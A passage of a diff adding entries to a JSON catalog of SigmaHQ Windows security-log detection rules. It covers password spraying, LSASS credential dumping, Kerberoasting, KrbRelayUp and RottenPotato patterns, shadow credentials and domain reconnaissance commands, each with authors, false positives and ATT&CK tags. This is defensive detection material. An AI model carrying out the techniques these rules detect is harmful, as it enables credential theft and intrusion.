"falsepositive": [ + "Vulnerability scanners", + "Misconfigured systems", + "Remote administration tools", + "VPN terminators", + "Multiuser systems like Citrix server farms" + ], + "filename": "win_security_susp_failed_logons_single_source_kerberos.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + 
"uuid": "5d1d946e-32e6-4d9a-a0dc-0ac022c7eb98", + "value": "Valid Users Failing to Authenticate From Single Source Using Kerberos" + }, + { + "description": "Detects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol.", + "meta": { + "author": "Mauricio Velazco, frack113", + "creation_date": "2021/06/01", + "falsepositive": [ + "Vulnerability scanners", + "Misconfigured systems", + "Remote administration tools", + "VPN terminators", + "Multiuser systems like Citrix server farms" + ], + "filename": "win_security_susp_failed_logons_single_source_kerberos2.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos2.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "4b6fe998-b69c-46d8-901b-13677c9fb663", + "value": "Disabled Users Failing To Authenticate From Source Using Kerberos" + }, + { + "description": "Detects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol.", + "meta": { + "author": "Mauricio Velazco, frack113", + "creation_date": "2021/06/01", + "falsepositive": [ + "Vulnerability scanners", + "Misconfigured systems", + "Remote administration tools", + "VPN terminators", + "Multiuser systems like Citrix server farms" + ], + "filename": "win_security_susp_failed_logons_single_source_kerberos3.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos3.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "bc93dfe6-8242-411e-a2dd-d16fa0cc8564", + "value": "Invalid Users Failing To Authenticate From Source Using Kerberos" + }, + { + "description": "Detects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol.", + "meta": { + "author": "Mauricio Velazco", + "creation_date": "2021/06/01", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_single_source_ntlm.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_ntlm.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "f88bab7f-b1f4-41bb-bdb1-4b8af35b0470", + "value": "Valid Users Failing to Authenticate from Single Source Using NTLM" + }, + { + "description": "Detects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol.", + "meta": { + "author": "Mauricio Velazco", + "creation_date": "2021/06/01", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_single_source_ntlm2.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + 
"refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_ntlm2.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "56d62ef8-3462-4890-9859-7b41e541f8d5", + "value": "Invalid Users Failing To Authenticate From Single Source Using NTLM" + }, + { + "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/19", + "falsepositive": [ + "User using a disabled account" + ], + "filename": "win_security_susp_failed_logon_reasons.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", + "https://twitter.com/SBousseaden/status/1101431884540710913", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "9eb99343-d336-4020-a3cd-67f3819e68ee", + "value": "Account Tampering - Suspicious Failed Logon Reasons" + }, + { + "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", + "meta": { + "author": "NVISO", + "creation_date": "2020/05/06", + "falsepositive": [ + "Legitimate logon attempts over the internet", + "IPv4-to-IPv6 mapped IPs" + ], + "filename": "win_security_susp_failed_logon_source.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + 
"refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_source.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.t1078", + "attack.t1190", + "attack.t1133" + ] + }, + "uuid": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", + "value": "Failed Logon From Public IP" + }, + { + "description": "Detects a source system failing to authenticate against a remote host with multiple users.", + "meta": { + "author": "Mauricio Velazco", + "creation_date": "2021/06/01", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_remote_logons_single_source.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_remote_logons_single_source.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "add2ef8d-dc91-4002-9e7e-f2702369f53a", + "value": "Multiple Users Remotely Failing To Authenticate From Single Source" + }, + { + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/10", + "falsepositive": [ + "Faulty legacy applications" + ], + "filename": "win_security_susp_kerberos_manipulation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml" + ], + "tags": [ + "attack.credential_access", + 
"attack.t1212" + ] + }, + "uuid": "f7644214-0eb0-4ace-9455-331ec4c09253", + "value": "Kerberos Manipulation" + }, + { + "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", + "meta": { + "author": "@SBousseaden, Florian Roth", + "creation_date": "2022/04/27", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_krbrelayup.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g", + "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_krbrelayup.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access" + ] + }, + "uuid": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "value": "KrbRelayUp Attack Pattern" + }, + { + "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "meta": { + "author": "xknow @xknow_infosec", + "creation_date": "2019/03/24", + "falsepositive": [ + "Companies, who may use these default LDAP-Attributes for personal information" + ], + "filename": "win_security_susp_ldap_dataexchange.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", + "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", + "https://github.com/fox-it/LDAPFragger", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml" + ], + "tags": [ + "attack.t1001.003", + "attack.command_and_control" + ] + }, + "uuid": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "value": "Suspicious LDAP-Attributes Used" + }, + { + "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", + "meta": { + "author": "James Pemberton / @4A616D6573", + "creation_date": "2019/10/31", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_local_anon_logon_created.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1189469425482829824", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_local_anon_logon_created.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001", + "attack.t1136.002" + ] + }, + "uuid": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "value": "Suspicious Windows ANONYMOUS LOGON Local Account Created" + }, + { + "description": "Detects suspicious processes logging on with explicit credentials", + "meta": { + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", + "creation_date": "2020/10/05", + "falsepositive": [ + "Administrators that use the RunAS command or scheduled tasks" + ], + "filename": "win_security_susp_logon_explicit_credentials.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_explicit_credentials.yml" + ], + "tags": [ + "attack.t1078", + 
"attack.lateral_movement" + ] + }, + "uuid": "941e5c45-cda7-4864-8cea-bbb7458d194a", + "value": "Suspicious Remote Logon with Explicit Credentials" + }, + { + "description": "Detects logon events that specify new credentials", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/04/06", + "falsepositive": [ + "Legitimate remote administration activity" + ], + "filename": "win_security_susp_logon_newcredentials.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_newcredentials.yml" + ], + "tags": "No established tags" + }, + "uuid": "def8b624-e08f-4ae1-8612-1ba21190da6b", + "value": "Outgoing Logon with New Credentials" + }, + { + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "meta": { + "author": "sigma", + "creation_date": "2017/02/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_lsass_dump.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/jackcr/status/807385668833968128", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", + "value": "Password Dumper Activity on LSASS" + }, + { + "description": "Detects process handle on LSASS process with certain access mask", + "meta": { + "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "creation_date": "2019/11/01", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason; update the whitelist 
with it" + ], + "filename": "win_security_susp_lsass_dump_generic.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml" + ], + "tags": [ + "attack.credential_access", + "car.2019-04-004", + "attack.t1003.001" + ] + }, + "uuid": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "value": "Generic Password Dumper Activity on LSASS" + }, + { + "description": "Detects multiple file rename or delete events occurrence within a specified period of time by a same user (these events may signalize about ransomware activity).", + "meta": { + "author": "Vasiliy Burov, oscd.community", + "creation_date": "2020/10/16", + "falsepositive": [ + "Software uninstallation", + "Files restore activities" + ], + "filename": "win_security_susp_multiple_files_renamed_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.manageengine.com/data-security/how-to/how-to-detect-ransomware-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_multiple_files_renamed_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "97919310-06a7-482c-9639-92b67ed63cf8", + "value": "Suspicious Multiple File Rename Or Delete Occurred" + }, + { + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "meta": { + "author": "Florian Roth (rule), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", + "creation_date": "2017/03/07", + "falsepositive": [ + "Administrator activity" + ], + 
"filename": "win_security_susp_net_recon_activity.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002", + "attack.t1069.002", + "attack.s0039" + ] + }, + "uuid": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "value": "Reconnaissance Activity" + }, + { + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/09", + "falsepositive": [ + "Legitimate used of encrypted ZIP files" + ], + "filename": "win_security_susp_opened_encrypted_zip.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1523383197513379841", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml" + ], + "tags": "No established tags" + }, + "uuid": "00ba9da1-b510-4f6b-b258-8d338836180f", + "value": "Password Protected ZIP File Opened" + }, + { + "description": "Detects the extraction of password protected ZIP archives with suspicious file names. 
See the filename variable for more details on which file has been opened.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/09", + "falsepositive": [ + "Legitimate used of encrypted ZIP files" + ], + "filename": "win_security_susp_opened_encrypted_zip_filename.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1523383197513379841", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml" + ], + "tags": "No established tags" + }, + "uuid": "54f0434b-726f-48a1-b2aa-067df14516e4", + "value": "Password Protected ZIP File Opened (Suspicious Filenames)" + }, + { + "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/09", + "falsepositive": [ + "Legitimate used of encrypted ZIP files" + ], + "filename": "win_security_susp_opened_encrypted_zip_outlook.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1523383197513379841", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml" + ], + "tags": "No established tags" + }, + "uuid": "571498c8-908e-40b4-910b-d2369159a3da", + "value": "Password Protected ZIP File Opened (Email Attachment)" + }, + { + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Other browsers" + ], + "filename": "win_security_susp_outbound_kerberos_connection.yml", + "level": 
"high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/Rubeus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_outbound_kerberos_connection.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1558.003" + ] + }, + "uuid": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", + "value": "Suspicious Outbound Kerberos Connection - Security" + }, + { + "description": "Detects possible addition of shadow credentials to an active directory object.", + "meta": { + "author": "Nasreddine Bencherchali (rule), Elastic (idea)", + "creation_date": "2022/10/17", + "falsepositive": [ + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" + ], + "filename": "win_security_susp_possible_shadow_credentials_added.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html", + "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/", + "https://twitter.com/SBousseaden/status/1581300963650187264?", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1556" + ] + }, + "uuid": "f598ea0c-c25a-4f72-a219-50c44411c791", + "value": "Possible Shadow Credentials Added" + }, + { + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + 
"falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_psexec.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_psexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", + "value": "Suspicious PsExec Execution" + }, + { + "description": "Detects known sensitive file extensions accessed on a network share", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "Help Desk operator doing backup or re-imaging end user machine or backup software", + "Users working with these data types or exchanging message files" + ], + "filename": "win_security_susp_raccess_sensitive_fext.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_raccess_sensitive_fext.yml" + ], + "tags": [ + "attack.collection", + "attack.t1039" + ] + }, + "uuid": "91c945bc-2ad1-4799-a591-4d00198a1215", + "value": "Suspicious Access to Sensitive File Extensions" + }, + { + "description": "Detects service ticket requests using RC4 encryption type", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/06", + "falsepositive": [ + "Service accounts used on legacy systems (e.g. 
NetApp)", + "Windows Domains with DFL 2003 and legacy systems" + ], + "filename": "win_security_susp_rc4_kerberos.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=3458", + "https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "value": "Suspicious Kerberos RC4 Ticket Encryption" + }, + { + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "meta": { + "author": "@SBousseaden, Florian Roth", + "creation_date": "2019/11/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_rottenpotato.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1195284233729777665", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rottenpotato.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1557.001" + ] + }, + "uuid": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", + "value": "RottenPotato Like Attack Pattern" + }, + { + "description": "Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser().\n\"Audit User Account Management\" in \"Advanced Audit Policy Configuration\" has to be enabled in your local security policy / GPO to see this events.\n", + "meta": { + "author": "Dimitrios Slamaris", + "creation_date": "2017/06/09", + "falsepositive": "No established falsepositives", + "filename": "win_security_susp_samr_pwset.yml", + "level": "medium", + 
"logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_samr_pwset.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ] + }, + "uuid": "7818b381-5eb1-4641-bea5-ef9e4cfb5951", + "value": "Possible Remote Password Change Through SAMR" + }, + { + "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_scheduled_task_creation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "3a734d25-df5c-4b99-8034-af1ddb5883a4", + "value": "Suspicious Scheduled Task Creation" + }, + { + "description": "Detects when adversaries stop services or processes by deleting or disabling their respective schdueled tasks in order to conduct data destructive activities", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_scheduled_task_delete.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", + "value": "Important Scheduled Task Deleted/Disabled" + }, + { + "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/05", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_scheduled_task_update.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" + ] + }, + "uuid": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "value": "Suspicious Scheduled Task Update" + }, + { + "description": "Detects renaming of file while deletion with SDelete tool.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/06/14", + "falsepositive": [ + "Legitimate usage of SDelete" + ], + "filename": "win_security_susp_sdelete.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml" + ], + "tags": [ + "attack.impact", + "attack.defense_evasion", + "attack.t1070.004", + 
"attack.t1027.005", + "attack.t1485", + "attack.t1553.002", + "attack.s0195" + ] + }, + "uuid": "39a80702-d7ca-4a83-b776-525b1f86a36d", + "value": "Secure Deletion with SDelete" + }, + { + "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", + "meta": { + "author": "@neu5ron", + "creation_date": "2019/02/05", + "falsepositive": [ + "HyperV or other virtualization technologies with binary not listed in filter portion of detection" + ], + "filename": "win_security_susp_time_modification.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", + "Live environment caused by malware", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ] + }, + "uuid": "faa031b5-21ed-4e02-8881-2591f98d82ed", + "value": "Unauthorized System Time Modification" + }, + { + "description": "Detection of logins performed with WMI", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/12/04", + "falsepositive": [ + "Monitoring tools", + "Legitimate system administration" + ], + "filename": "win_security_susp_wmi_login.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_wmi_login.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "5af54681-df95-4c26-854f-2565e13cfab0", + "value": "Login with WMI" + }, + { + "description": "Detects remote service activity via remote access to the svcctl named pipe", + "meta": { + "author": "Samir Bousseaden", + 
"creation_date": "2019/04/03", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_svcctl_remote_service.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_svcctl_remote_service.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.persistence", + "attack.t1021.002" + ] + }, + "uuid": "586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3", + "value": "Remote Service Activity via SVCCTL Named Pipe" + }, + { + "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_syskey_registry_access.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190625024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_syskey_registry_access.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012" + ] + }, + "uuid": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", + "value": "SysKey Registry Keys Access" + }, + { + "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/07/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_sysmon_channel_reference_deletion.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Flangvik/status/1283054508084473861", + 
"https://twitter.com/SecurityJosh/status/1283027365770276866", + "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html", + "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "value": "Sysmon Channel Reference Deletion" + }, + { + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "meta": { + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate OpenVPN TAP insntallation" + ], + "filename": "win_security_tap_driver_installation.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_tap_driver_installation.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ] + }, + "uuid": "9c8afa4d-0022-48f0-9456-3712466f9701", + "value": "Tap Driver Installation - Security" + }, + { + "description": "Detects an access to authentication 